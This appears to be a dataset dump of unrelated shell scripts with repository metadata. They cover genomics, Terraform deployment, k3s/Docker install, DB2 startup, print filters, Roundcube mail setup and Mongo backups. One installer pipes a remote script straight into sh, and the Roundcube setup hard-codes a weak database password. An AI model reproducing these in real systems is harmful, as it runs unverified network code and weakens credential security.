input_gvcf=$4
SINGLE_ARRAY_LIMIT=$5
gatkVer=$6
intvlFile=$7
parallelizeQ=$8
analysisType=$9
scaffoldsFile=${10}
source ${CONFIG}
source ${SEQUENCE_HANDLING}/Handlers/Genotype_GVCFs.sh
# Call on function
# Variables below are stored in CONFIG
Genotype_GVCFs ${input_gvcf} ${OUT_DIR} ${GATK_JAR} ${REF_GEN} ${THETA} ${PLOIDY} ${GG_MEM} ${REF_DICT} ${SINGLE_ARRAY_LIMIT} ${gatkVer} ${intvlFile} ${parallelizeQ} ${analysisType} ${scaffoldsFile} ${GG_COMBINED_VCF} ${PROJECT} ${TMP}
| true
|
10291b5a5fb794e0100eed69bfc0205db4b1fc1e
|
Shell
|
yesteph/meetup-cd
|
/terraform/blue-green/demo.sh
|
UTF-8
| 1,240
| 3
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -e
TF_WORKSPACE=blue-green
DOCKER_TAG=v1
read -n 1 -p "Apply TF in commons - deployment_step=create_green ?" mainmenuinput
cd commons
terraform init -get -reconfigure
terraform workspace select ${TF_WORKSPACE}
terraform apply -var deployment_step=create_green -auto-approve
GREEN_ENV=$(terraform output green_env)
GREEN_ENDPOINT=http://$(terraform output green-service-endpoint)
cd -
read -n 1 -p "Apply TF in guestbook-datastore ?" mainmenuinput
cd guestbook-datastore
terraform init -get -reconfigure
terraform workspace select ${TF_WORKSPACE}
terraform apply -auto-approve
cd -
read -n 1 -p "Apply TF in guestbook-service/workspace: ${TF_WORKSPACE}-${GREEN_ENV}/ docker_tag=${DOCKER_TAG} ?" mainmenuinput
cd guestbook-service
terraform init -get -reconfigure
terraform workspace select ${TF_WORKSPACE}-${GREEN_ENV}
terraform apply -var docker_tag=${DOCKER_TAG} -auto-approve
cd -
read -n 1 -p "You can preview new release ${GREEN_ENDPOINT} ... Want to promote ?" mainmenuinput
cd commons
terraform apply -var deployment_step=promote_green -auto-approve
read -n 1 -p "Want to mark current green as new blue ?" mainmenuinput
terraform apply -var deployment_step=finalize_deployment -auto-approve
cd -
| true
|
b84938775ae906e44448c23ac71a97e136f81561
|
Shell
|
RedBaron80/urlpath
|
/install.sh
|
UTF-8
| 1,201
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get install unzip docker.io -y
# Downloading the software
wget https://github.com/RedBaron80/urlpath/archive/master.zip
unzip master.zip
# Installing kubernetes k3s
curl -sfL https://get.k3s.io | sh -
# Permissions
sudo chown ubuntu /etc/rancher/k3s/k3s.yaml
# sudo usermod -aG docker ubuntu # we would have to log out and log in again
sudo docker build urlpath-master/httpd-proxy -t httpd-proxy:1.0
sudo docker build urlpath-master/urlpath-django -t urlpath:1.0
# Importing images to k3s local registry
sudo docker save --output urlpath.tar urlpath:1.0
# Applying kubernetes configuration
kubectl apply -f urlpath-master/kubernetes/urlpath-deployment.yaml
sudo docker save --output httpd-proxy.tar httpd-proxy:1.0
sudo k3s ctr images import httpd-proxy.tar
kubectl apply -f urlpath-master/kubernetes/httpd-proxy-deployment.yaml
sudo k3s ctr images import urlpath.tar
kubectl apply -f urlpath-master/kubernetes/urlpath-deployment.yaml
kubectl apply -f urlpath-master/kubernetes/httpd-proxy-service.yaml
kubectl apply -f urlpath-master/kubernetes/urlpath-service.yaml
kubectl apply -f urlpath-master/kubernetes/ingress.yaml
echo "Done!!"
| true
|
45cba8c82180cf31102e1707e292a6b76534de35
|
Shell
|
semyon-gordeev/jibri
|
/scripts/launch_recording.sh
|
UTF-8
| 501
| 3.140625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#Directory for storing pids (should be writeable by jibri user)
PID_DIR=/var/run/jibri/
URL=$1
STREAM=$2
TOKEN=$3
YOUTUBE_STREAM_ID=$4
YOUTUBE_BACKUP=$5
#
#YOUTUBE_BASE="rtmp://a.rtmp.youtube.com/live2"
#
#if [ ! -z "$5" ]; then
# YOUTUBE_BASE="rtmp://b.rtmp.youtube.com/live2"
#fi
#
#if [ ! -z "$4" ]; then
# STREAM="${YOUTUBE_BASE}/${YOUTUBE_STREAM_ID}"
#
# if [ ! -z "$5" ]; then
# STREAM="${STREAM}?backup=1"
# fi
#
#fi
$PWD/../scripts/start-ffmpeg.sh "$STREAM"
| true
|
9d1d3546468d512469590e4a4c7e96ed2d2cfd09
|
Shell
|
vishnu388/shell-programming
|
/sequance-programming/sumNum.sh
|
UTF-8
| 208
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash -x
read -p "Enter 1st number:" a
read -p "Enter 2nd number:" b
read -p "Enter 3rd number:" c
read -p "Enter 4th number:" d
read -p "Enter 5th number:" e
result=$((a+b+c+d+e))
avg=$((result/5))
| true
|
cf5232c558a62f8a31904cb813451b61dcef359e
|
Shell
|
ArcherCraftStore/ArcherVMPeridot
|
/phpMyAdmin/libraries/plugins/transformations/generator_main_class.sh
|
UTF-8
| 363
| 3.546875
| 4
|
[
"GPL-2.0-only",
"GPL-1.0-or-later",
"GPL-3.0-only",
"MIT",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Shell script that creates only the main class for a new transformation
# plug-in, using a template
#
# $1: MIMEType
# $2: MIMESubtype
# $3: Transformation Name
if [ $# != 3 ]
then
echo -e "Usage: ./generator_main_class.sh MIMEType MIMESubtype TransformationName\n"
exit 65
fi
./generator_plugin.sh "$1" "$2" "$3" "--generate_only_main_class"
| true
|
bfe929270d4c6db1bc432992177112b05be36977
|
Shell
|
nickivanov/db2_autostart_scripts
|
/db2_rhel
|
UTF-8
| 3,011
| 4.0625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/sh
#
# /etc/init.d/db2
#
#
# System startup script for the DB2 instances.
# Will start/stop whatever instances are enabled to
# start at boot time in the DB2 global registry.
# See the DB2 Information Center for the db2greg
# utility for more details.
#
# This is specific for RHEL, may not work on other
# distributions.
#
# Edit the DB2_INSTALL_PATH variable. Drop this script
# in /etc/init.d. Call `chkconfig --add db2`.
#
# Copyright 2013 Nick Ivanov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
### BEGIN INIT INFO
# Provides: db2
# Required-Start: $local_fs
# Required-Stop: $local_fs
# X-Start-Before: $network
# X-Stop-After: $network
# Default-Start: 3 5
# Default-Stop: 0 1 2 6
# Short-Description: Start/stop DB2 instance processes
### END INIT INFO
# DB2 installation path; only one if multiple versions installed
# !!! Change this according to your environment
DB2_INSTALL_PATH=/opt/ibm/db2/V10.1
# Source common functions
. /etc/init.d/functions
list_instances() {
$DB2_INSTALL_PATH/bin/db2greg -dump | grep -E '^I,DB2' | \
cut -d, --output-delimiter=" " -s -f4,5,7
}
checkproc() {
# sort of replacement for the SuSE checkproc
ps -C db2sysc --no-heading -o uname | grep -c $1>/dev/null
}
RET=0
case "$1" in
start)
echo "Checking DB2 instances..."
# read DB2 instances from the global registry
list_instances | while read INST INSTDIR AUTOSTART
do
if [ $AUTOSTART -eq 1 ]
then
echo -n " $INST"
su - $INST -c $INSTDIR/adm/db2start>/dev/null& # send to background
RC=$?
[ $RC -eq 0 ] && success || failure
echo
RET+=$RC
fi
done
;;
status)
echo "Checking for DB2 instances..."
list_instances | while read INST INSTDIR AUTOSTART
do
echo -n " $INST"
checkproc $INST
RC=$?
[ $RC -eq 0 ] && success # just report those that are running
[ $RC -gt 0 -a $AUTOSTART -eq 1 ] && failure # autostart instances should be running
[ $RC -gt 0 -a $AUTOSTART -ne 1 ] && passed # ignore non-autostart instances
echo
done
;;
stop)
echo "Stopping all DB2 instances..."
list_instances | while read INST INSTDIR AUTOSTART
do
checkproc $INST
RC=$?
if [ $RC -eq 0 ]
then
echo -n " $INST"
su - $INST -c "$INSTDIR/adm/db2stop force">/dev/null # wait for it to stop
RC=$?
[ $RC -eq 0 ] && success || failure
echo
RET+=$RC
fi
done
;;
*)
echo "Usage: $0 {start|stop|status}"
RET=1
;;
esac
exit $RET
| true
|
2934247e80f2008c103bf87e46475c5a67cda985
|
Shell
|
Wes-Eason/avr-toolchain-build-scripts
|
/util.sh
|
UTF-8
| 1,356
| 3.828125
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
function log_ts() {
while read -r line; do
now="$(date '+%F %T')"
echo "[$now] $line"
done
}
function log_prefix() {
while read -r line; do
prefix="$1"
[ -t 1 ] && prefix=$(printf "\e[33m$1\e[0m")
echo "$prefix| $line"
done
}
function checkpid() {
ps | cut -d" " -f1 | grep $(printf "%d" $1)
}
function waitpid() {
wait_on_pid=$1
message="$2"
prefix="$3"
done_msg="$4"
start_seconds=$SECONDS
[ -z "$done_msg" ] && done_msg="done"
[ -t 1 ] && done_msg="$(printf "\e[32m$done_msg\e[0m")"
exec 3>&2
exec 2>/dev/null
printf "[$prefix...] $message"
trap exit SIGINT
sample_line="$(printf "[%s%3s] %s" "$prefix" "${spinner[$i]}" "$message")"
linelen=$((${#sample_line} + 10))
i=0
spinner=(' ' '• ' '•• ' '•••')
#spinner=(' ' '. ' '.. ' '...')
while [ ! -z $(checkpid $wait_on_pid) ]; do
if [ -t 1 ]; then
printf "\r[%s\e[33m%3s\e[0m]($(($SECONDS-$start_seconds))s) %s" "$prefix" "${spinner[$i]}" "$message"
i=$(($i+1))
i=$(($i % ${#spinner[@]}))
sleep 0.33
fi
done
trap - SIGINT
[ -t 1 ] && printf "\r%${linelen}s\r" || printf "\n"
printf "[%s]($(($SECONDS-$start_seconds))s) %s\n" "$done_msg" "$message"
exec 2>&3
}
| true
|
fe3699789d0f017cad78995b2f1be771842daa12
|
Shell
|
kiligings/JobStream
|
/bin/stop.sh
|
UTF-8
| 259
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/sh
cd $JOBSTREAM_HOME
pid=`ps -ef|grep org.jobstream.MainScheduler|grep -v grep|grep -v PPID|awk '{ print $2}'`
if [[ $pid -gt 0 ]]
then
echo "MainScheduler Stopping..."
kill -9 $pid
echo "MainScheduler Stopped"
else
echo "MainScheduler Not Exist"
fi
| true
|
88cb2828a9794e62938c2d1d008fd0a72031ddb5
|
Shell
|
hdac-io/friday
|
/scripts/tests_with_cover.sh
|
UTF-8
| 293
| 2.75
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -e
echo "" > coverage.txt
for d in $(go list ./... | grep -v "client/cli" | grep -v "client/rest" | grep -v "friday/cmd"); do
go test -v -race -coverprofile=profile.out $d
if [ -f profile.out ]; then
cat profile.out >> coverage.txt
rm profile.out
fi
done
| true
|
47472b559d84713e3490184c0fec66692c6c8fbb
|
Shell
|
hzbarkan/csipb-jamu-prj
|
/c2map/ctm/download.sh
|
UTF-8
| 1,167
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
mainkeyword='diabetes mellitus'
declare -a keywords=("medicinal plant" "bioactivity" "bioassay" "extracts" "natural products")
# declare -a years=(2015 2014 2013 2012 2011 2010 2009 2008 2007 2006 2005 2004 2003 2002 2001 2000)
declare -a years=(1999 1998 1997 1996 1995 1994 1993 1992 1991 1990 1989 1988 1987 1986 1985 1984 1983 1982 1981 1980 1979 1978 1977 1976 1975 1974)
db=pubmed
out_dir=/home/tor/jamu/xprmnt/pubmed-article/05
mkdir -p $out_dir
for keyword in "${keywords[@]}"
do
for year in "${years[@]}"
do
timestamp="$(date +'%Y%m%d.%H%M%S')"
out_filepath=$out_dir/esearch.$timestamp.xml
meta_filepath=$out_dir/esearch.$timestamp.meta
query=(-query "$mainkeyword [TIAB] AND $keyword [TIAB] AND $year [PDAT]")
#
echo 'esearch for' "${query[@]}"
esearch_tic="$(date +'%Y%m%d.%H%M%S')"
esearch -db $db "${query[@]}" | \
efetch -format xml > $out_filepath
esearch_toc="$(date +'%Y%m%d.%H%M%S')"
#
echo $db >> $meta_filepath
echo "${query[@]}" >> $meta_filepath
echo $year >> $meta_filepath
echo $keyword >> $meta_filepath
echo $esearch_tic >> $meta_filepath
echo $esearch_toc >> $meta_filepath
done
done
| true
|
e394ed251f1f404e7ec6ab6a94ff3ca753dd74a9
|
Shell
|
bgirard/mozhelper
|
/mozconfig/env.sh
|
UTF-8
| 748
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
MOZCONFIG_NAME="obj-ff-64gdb"
MOZCONFIG=$( cat <<EOF
. $topsrcdir/browser/config/mozconfig
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/../builds/$MOZCONFIG_NAME
mk_add_options MOZ_MAKE_FLAGS="-w -s -j6"
ac_add_options --disable-tests
ac_add_options --disable-debug
ac_add_options --enable-debug-symbols
ac_add_options --enable-profiling
EOF
)
# Create the builds dir if it does not exist
mkdir -p "$PWD/../builds"
# Set the configuration
echo "$PWD" > ~/.config/moz_tree
echo "$PWD/../builds/mozconfig-$MOZCONFIG_NAME" > ~/.config/moz_config
echo "$PWD/../builds/$MOZCONFIG_NAME/" > ~/.config/moz_objdir
# Write the mozconfig
echo "$MOZCONFIG" > "$PWD/../builds/mozconfig-$MOZCONFIG_NAME"
# Show the configuration
echo $MOZCONFIG_NAME
| true
|
10bd5c735fb7a421a0bd30bb123a5b327e9bcd07
|
Shell
|
emerg-med/ross
|
/emerg-med_resources/printer_setup/rhs/rhs-printfilters/ncpprint
|
UTF-8
| 2,013
| 3.875
| 4
|
[] |
no_license
|
#!/bin/sh
# This script is an input filter for printcap printing on a unix machine. It
# uses the nprint program to print the file to the specified ncp-based
# server and queue.
# For example you could have a printcap entry like this
#
# ncp:lp=/dev/null:sd=/usr/spool/ncp:sh:if=/usr/local/bin/ncpprint
#
# which would create a unix printer called "ncp" that will print via this
# script. You will need to create the spool directory /usr/spool/ncp with
# appropriate permissions and ownerships for your system.
#
# Script further altered by hamiltom@ecnz.co.nz (Michael Hamilton)
# so that the server, service, and password can be read from
# a /usr/var/spool/lpd/PRINTNAME/.config file.
#
# In order for this to work the /etc/printcap entry must include an
# accounting file (af=...):
#
# cdcolour:\
# :cm=CD IBM Colorjet on 6th:\
# :sd=/var/spool/lpd/cdcolour:\
# :af=/var/spool/lpd/cdcolour/acct:\
# :if=/usr/local/etc/ncpprint:\
# :mx=0:\
# :lp=/dev/null:
#
# The /usr/var/spool/lpd/PRINTNAME/.config file should contain:
# server=PC_SERVER
# queue=PRINTER_QUEUE
# user="user"
# password="password"
#
# Please, do not modify the order in the file.
# Example:
# server=NWSERVER
# queue=P_QUEUE1
# user="fred"
# password=""
#
# The last parameter to the filter is the accounting file name.
# Extract the directory name from the file name.
# Concat this with /.config to get the config file.
#
eval acct_file=\$$#
spool_dir=`dirname $acct_file`
config_file=$spool_dir/.config
# Should read the following variables set in the config file:
# server
# queue
# user
# password
eval `cat $config_file`
if [ "$user" != "" ]; then
if [ "$password" != "" ]; then
usercmd="-U $user -P $password"
else
usercmd="-U $user -n"
fi
else
usercmd=""
fi
#cat > /tmp/printout
#x_command=""
#case $translate in
# yes) x_command="translate" ;;
#esac
#echo $server $password $translate $x_command > /tmp/ncpprint.log
cat | /usr/bin/nprint -S $server -q $queue $usercmd -N - 2>/dev/null
| true
|
1b285fd1a2b557263a76722256c5208a22b438e3
|
Shell
|
wmayner/dotfiles
|
/bin/convert2tiff
|
UTF-8
| 178
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/sh
# Convert all arguments (assumed .png)to a TIFF with 600 dpi
for i in $@; do
BN=$(basename $i .png)
convert -units PixelsPerInch $BN.png -density 600 $BN.tif
done
| true
|
ba8717fd3e1f47f75e747c618cc382c2ffaff27b
|
Shell
|
vishal0792/Cloud_Infrastructure_Deployment_Python_AWS
|
/newuserdata.txt
|
UTF-8
| 367
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
sudo su
yum update -y
yum install -y httpd.x86_64
yum install -y git
systemctl start httpd.service
systemctl enable httpd.service
echo "Hello World from $(hostname -f)" > /var/www/html/index.html
cd
mkdir vishal
cd vishal
git clone https://github.com/vishal0792/Assignment7_1.git
yes | cp -r /vishal/Assignment7_1/index.html /var/www/html
| true
|
84f9f0a24d3f9c60828bcb8b0f1828ecb55cded7
|
Shell
|
tenchd/mesh-testsuite
|
/run
|
UTF-8
| 1,703
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
set -euxo pipefail
sudo su -c 'echo 655350 > /proc/sys/vm/max_map_count'
sudo cpupower frequency-set -g performance
# so firefox is authorized to talk to X from within the containter
xhost local:root
VOLUME="mesh-artifact-data"
RUN_COUNT='1'
SPEC_FLAGS='--no-ref'
FF_WAIT_SECS="$(head -n 1 firefox-wait-seconds)"
RUN_FLAGS="--privileged --rm -t --mount type=volume,src=$VOLUME,dst=/data"
# docker volume rm "$VOLUME" || true
# docker volume create "$VOLUME" || true
TEST='0-firefox'
docker run $RUN_FLAGS --ipc=host -v /tmp/.X11-unix:/tmp/.X11-unix -e DISPLAY=$DISPLAY "$(cat ./$TEST/IMAGE-NAME)" ./entrypoint.sh $RUN_COUNT $FF_WAIT_SECS
TEST='1-redis'
# docker run $RUN_FLAGS bpowers/mesh-artifact-$TEST ./test --runs $RUN_COUNT --data-dir=/data/$TEST
TEST='2-spec'
# (cd 2-spec/runner && ./test $SPEC_FLAGS --volume=$VOLUME)
TEST='3-ruby'
# docker run $RUN_FLAGS bpowers/mesh-artifact-$TEST ./test --runs $RUN_COUNT --data-dir=/data/$TEST
sudo rm -rf ./results-old
if [ -d ./results ]; then
mv ./results ./results-old
fi
mkdir -p ./results
ANALYSIS_RUN="docker run $RUN_FLAGS --mount type=bind,src=$PWD/results,dst=/results --mount type=bind,src=$PWD/analysis,dst=/analysis,readonly bpowers/mesh-artifact-support "
# $ANALYSIS_RUN sh -c 'rm -rf /data/3-ruby'
# $ANALYSIS_RUN sh -c 'rm -rf /data/2-spec; cp -r /results/2-spec /data/'
# exit
$ANALYSIS_RUN sh -c 'cp -r /data/* /results/'
# docker sucks sometimes
sudo chown -R $USER results
./analysis/1-redis.py
./analysis/2-spec.py
./analysis/3-ruby.py
$ANALYSIS_RUN sh -c 'SOURCE_DATE_EPOCH=0 R --vanilla <analysis/figure-7-redis.r'
$ANALYSIS_RUN sh -c 'SOURCE_DATE_EPOCH=0 R --vanilla <analysis/figure-8-ruby.r'
| true
|
c150bc5a9cfdc35a2d3c75f03a61b82b0f52d99d
|
Shell
|
ma3ki/startupscripts
|
/publicscript/mailsystem/setup_scripts/_setup_roundcube_yum.sh
|
UTF-8
| 1,977
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash -x
set -e
source $(dirname $0)/../config.source
echo "---- $0 ----"
yum install -y roundcubemail php-mcrypt php-mysql
sed -i 's/^;default_charset/default_charset/' /etc/php.ini
sed -i "s/^;date.timezone.*/date.timezone = 'Asia\/Tokyo'/" /etc/php.ini
sed -i 's/^post_max_size =.*/post_max_size = 20M/' /etc/php.ini
sed -i 's/^upload_max_filesize =.*/upload_max_filesize = 20M/' /etc/php.ini
export HOME=/root
mysql -e "create database roundcubemail character set utf8 collate utf8_bin;"
mysql -e "grant all on roundcubemail.* to roundcube@localhost identified by 'roundcube';"
mysql -e "FLUSH PRIVILEGES;"
mysql roundcubemail < /usr/share/roundcubemail/SQL/mysql.initial.sql
systemctl restart php-fpm
ln -s /usr/share/roundcubemail ${HTTPS_DOCROOT}/roundcube
mkdir ${HTTPS_DOCROOT}/roundcube/{temp,logs}
chown -R nginx. /usr/share/roundcubemail
cp templates/config.inc.php.roundcube /etc/roundcubemail/config.inc.php
chgrp -R nginx /var/{lib,log}/roundcubemail /etc/roundcubemail
cp templates/config.inc.php.password ${HTTPS_DOCROOT}/roundcube/plugins/password/config.inc.php
chown nginx. ${HTTPS_DOCROOT}/roundcube/plugins/password/config.inc.php
cp -p ${HTTPS_DOCROOT}/roundcube/plugins/managesieve/config.inc.php.dist ${HTTPS_DOCROOT}/roundcube/plugins/managesieve/config.inc.php
sed -i "s#_DOMAIN_#ssl://${FIRST_DOMAIN}#" /etc/roundcubemail/config.inc.php
cd ${HTTPS_DOCROOT}/roundcube/plugins/
git clone https://github.com/messagerie-melanie2/Roundcube-Plugin-Mobile.git
git clone https://github.com/messagerie-melanie2/Roundcube-Plugin-JQuery-Mobile.git
mv Roundcube-Plugin-JQuery-Mobile jquery_mobile
mv Roundcube-Plugin-Mobile mobile
chown nginx. jquery_mobile mobile
cd ../skins
git clone https://github.com/messagerie-melanie2/Roundcube-Skin-Melanie2-Larry-Mobile.git
mv Roundcube-Skin-Melanie2-Larry-Mobile melanie2_larry_mobile
chown nginx. melanie2_larry_mobile
mv ${HTTPS_DOCROOT}/roundcube/installer ${HTTPS_DOCROOT}/roundcube/_installer
| true
|
70786019075132206ad3069317a89bf7eca0db6f
|
Shell
|
jackrain/spbootdocker
|
/acs/bin/start
|
UTF-8
| 2,208
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
AGENT=""
if [ ! -n "$JAR_FILE" ] ;then
JAR_FILE=bootapp.jar
fi
if [ ! -n "$HTTP_PORT" ] ;then
HTTP_PORT=8080
fi
if [ ! -n "$JAVA_OPTS" ] ;then
JAVA_OPTS=-Djava.security.egd=file:/dev/./urandom
fi
echo -e "HTTP_PORT:$HTTP_PORT\nJAR_FILE:$JAR_FILE\nJAVA_OPTS:$JAVA_OPTS"
echo "FAT_JAR_PARAMS = $FAT_JAR_PARAMS"
function ExportPath(){
echo "Begin ExportEnv"
export PATH=$PATH:/acs/user/jdk/bin:/acs/bin
export CLASSPATH=/acs/user/jdk/lib:$CLASSPATH
export LANG=en_US.UTF-8
}
function GetAgent(){
if [ ! -n "$CONF_AGENT" ] ;then
echo "CONF_AGENT IS NULL"
else
echo "get agent"
echo "$CONF_AGENT"
echo "wget agentzip from $CONF_AGENT"
wget -nv -O /acs/agent.zip $CONF_AGENT
unzip -q -o /acs/agent.zip -d /acs/agent
AGENT=$(find /acs/agent -name "*agent.jar" | head -n 1)
echo "agent app is $AGENT"
fi
}
function Start(){
rm -f tpid
if [ ! -n "$AGENT" ] ;then
exec java $CATALINA_OPTS $JAVA_OPTS -Dserver.port=$HTTP_PORT -jar /acs/src/$JAR_FILE ${FAT_JAR_PARAMS} > /dev/stdout 2>&1 &
else
exec java -javaagent:$AGENT $CATALINA_OPTS $JAVA_OPTS -Dserver.port=$HTTP_PORT -jar /acs/src/$JAR_FILE ${FAT_JAR_PARAMS} > /dev/stdout 2>&1 &
fi
echo "/acs/src/$JAR_FILE"
echo $! > tpid
echo Start springboot Success!
}
function Cpapp(){
echo "Begin to copy app code to webapps"
CODE_EXIST=`ls /acs/code`
if [ ! -z "$CODE_EXIST" ];then
rm -fr /acs/src/
mkdir -p /acs/src
cp -R /acs/code/* /acs/src/
fi
}
#main
ExportPath
GetAgent
Cpapp
Start
| true
|
d2fd5ade87cb23f0ffd8258074c33b6083d465e0
|
Shell
|
havok4u/profilesys
|
/profilesys
|
UTF-8
| 2,379
| 3.484375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
################################################################################
# <copyright file="notification.py" owner="Tim Epkes">
# Copyright (c) 2018 All Right Reserved
#
# Please see the LICENSE.txt file for more information.
# All other rights reserved.
#
# THIS CODE AND INFORMATION ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY
# KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
# PARTICULAR PURPOSE.
#
# </copyright>
# <author>Tim Epkes</author>
# <email>tim.epkes@gmail.com</email>
# <date>2018-08-01</date>
# <summary>Contains code for the system profiler</summary>
################################################################################
declare -A record
fields=5
classifier=""
for i in `ls /sys/class/net`
do
if [ -d /sys/class/net/$i/device ]
then
classifier=$i"|"$classifier
fi
done
# Get physical network interface
counter=1
#for i in `virsh nodedev-list | egrep ${classifier::-1}`
for i in `virsh nodedev-list | egrep ${classifier%?}`
do
# Get interface Name and pci
ARRAY=`virsh nodedev-dumpxml $i | egrep "parent|interface" | sed -e 's/<[^>]*>//g'`
array=(${ARRAY// / })
record[$counter,pci]=`echo ${array[0]} | awk -F '_' '{print $3"_"$4"_"$5}'`
record[$counter,pname]=${array[1]}
# Get physical slot mapping
pci=`echo ${record[$counter,pci]} | sed -e 's/_/:/' | sed -e 's/_/./'`
pslot=`lspci -v -s $pci | grep Physical | awk '{print $3}'`
if [ -z $pslot ]
then
record[$counter,pslot]="na"
else
record[$counter,pslot]=$pslot
fi
# Get numa mapping
record[$counter,numa]=`cat /sys/class/net/${record[$counter,pname]}/device/numa_node`
# Get driver
record[$counter,driver]=`lspci -v -s $pci | grep driver | awk '{print $5}'`
((counter++))
done
# output CPU information
echo
printf "CPU information\n"
printf '=%.0s' {1..37}
printf "\n"
lscpu | egrep "Architecture|Byte Order|CPU\(s\)|Thread|CPU|Virtualization|L2 cache"
echo
# output NIC Slot information
printf "Network Card Slot Information\n"
printf "%-10s %-10s %-10s %-5s %-10s\n" "PCI" "IntName" "PhysSlot" "Numa" "Driver"
printf '=%.0s' {1..47}
printf "\n"
END=$((${#record[@]}/fields))
for i in $(seq 1 $END)
do
printf "%-10s %-10s %-10s %-5s %-10s\n" ${record[$i,pci]} ${record[$i,pname]} ${record[$i,pslot]} ${record[$i,numa]} ${record[$i,driver]}
done
| true
|
38358ae6b29a796b409452cc84b60fd4b148c55b
|
Shell
|
cjenkin2/EHWE-21
|
/vpu_test/encode_yuv.sh
|
UTF-8
| 1,885
| 3.484375
| 3
|
[] |
no_license
|
if [[ ($# -ne 5) && ($# -ne 6) ]]
then
echo "usage: $0 <input_yuv> <output_vid> <width> <height> <cap> [vpu_params]"
exit 65 # bad parameters
fi
INPUT_YUV=$1
OUTPUT_FILE=$2
WIDTH=$3
HEIGHT=$4
CAP=$5
# vpuencoder params
if [[ -z $6 ]]
then
PARAMS=""
else
PARAMS=$6
fi
#helper functions
function set_date()
{
DATE="$(date)"
DATE="${DATE// /_}"
DATE="${DATE//:/-}"
}
#export variables
export GST_DEBUG_DUMP_DOT_DIR="$(pwd)/temp"
# local variables
let "BLOCKSIZE = ($WIDTH * $HEIGHT * 3) / 2"
YUV_BASENAME=$(basename $INPUT_YUV)
LOGFILE="encode.log"
GRAPHDIR="$(pwd)/graphs"
DOTDIR="$(pwd)/dots"
MD5="$OUTPUT_FILE.md5sum"
EXT=$(echo $CAP | cut -d"/" -f2)
#code
set_date
echo "============================" >> $LOGFILE
echo "$DATE" >> $LOGFILE
echo "encoding: $INPUT_YUV" >> $LOGFILE
echo "format : $CAP" >> $LOGFILE
echo "params : $PARAMS" >> $LOGFILE
echo "----------------------------" >> $LOGFILE
echo "using pipeline: gst-launch filesrc location=$INPUT_YUV blocksize=$BLOCKSIZE !" \
"\"video/x-raw-yuv,format=(fourcc)I420,width=$WIDTH,height=$HEIGHT\" ! " \
"mfw_vpuencoder $PARAMS ! $CAP ! " \
"tee name=t ! queue ! filesink location=$OUTPUT_FILE" \
"t. ! queue ! avimux ! filesink location=$OUTPUT_FILE.avi" >> $LOGFILE
GST_LAUNCH_OUTPUT=$(timeout 240 gst-launch filesrc location=$INPUT_YUV blocksize=$BLOCKSIZE ! \
"video/x-raw-yuv,format=(fourcc)I420,width=$WIDTH,height=$HEIGHT" ! \
mfw_vpuencoder $PARAMS ! $CAP ! \
tee name=t ! queue ! filesink location=$OUTPUT_FILE \
t. ! queue ! avimux ! filesink location=$OUTPUT_FILE.avi)
md5sum $OUTPUT_FILE > $MD5
echo "$GST_LAUNCH_OUTPUT" >> $LOGFILE
#rename generated dot files
./dot_cleanup.sh "$YUV_BASENAME.$EXT.$DATE" "gst-launch"
#make graph of PAUSED_READY
echo $(./mk_pipeline_graph.sh "READY_PAUSED" $DATE) | tee -a $LOGFILE | cat
| true
|
5c9f29ad8c003e42900df24d51fe1c41a8095ba8
|
Shell
|
basharal/mongo-s3-backup
|
/start.sh
|
UTF-8
| 1,262
| 3.421875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
ACCESS_KEY=${ACCESS_KEY:?"ACCESS_KEY env variable is required"}
SECRET_KEY=${SECRET_KEY:?"SECRET_KEY env variable is required"}
MONGO_HOST=${MONGO_HOST:?"MONGO_HOST env variable is required"}
S3_PATH=${S3_PATH:?"S3_PATH env variable is required"}
MONGO_PORT=${MONGO_PORT:-27017}
DATA_PATH=${DATA_PATH:-/root/}
CRON_SCHEDULE=${CRON_SCHEDULE:-0 6 * * *}
PARAMS=${PARAMS}
echo "access_key=$ACCESS_KEY" >> /root/.s3cfg
echo "secret_key=$SECRET_KEY" >> /root/.s3cfg
if [[ "$1" == 'no-cron' ]]; then
exec /backup.sh
# in the future, support restore
else
LOGFIFO='/var/log/cron.fifo'
if [[ ! -e "$LOGFIFO" ]]; then
mkfifo "$LOGFIFO"
fi
CRON_ENV="PARAMS='$PARAMS'"
CRON_ENV="$CRON_ENV\nACCESS_KEY='$ACCESS_KEY'"
CRON_ENV="$CRON_ENV\nSECRET_KEY='$SECRET_KEY'"
CRON_ENV="$CRON_ENV\nDATA_PATH='$DATA_PATH'"
CRON_ENV="$CRON_ENV\nS3_PATH='$S3_PATH'"
CRON_ENV="$CRON_ENV\nMONGO_HOST='$MONGO_HOST'"
CRON_ENV="$CRON_ENV\nMONGO_PORT='$MONGO_PORT'"
echo -e "$CRON_ENV\n$CRON_SCHEDULE /backup.sh > $LOGFIFO 2>&1" | crontab -
crontab -l
# there is a slight race-condition where cron might not see the crontab files
# the sleep is to avoid that
sleep 3
cron
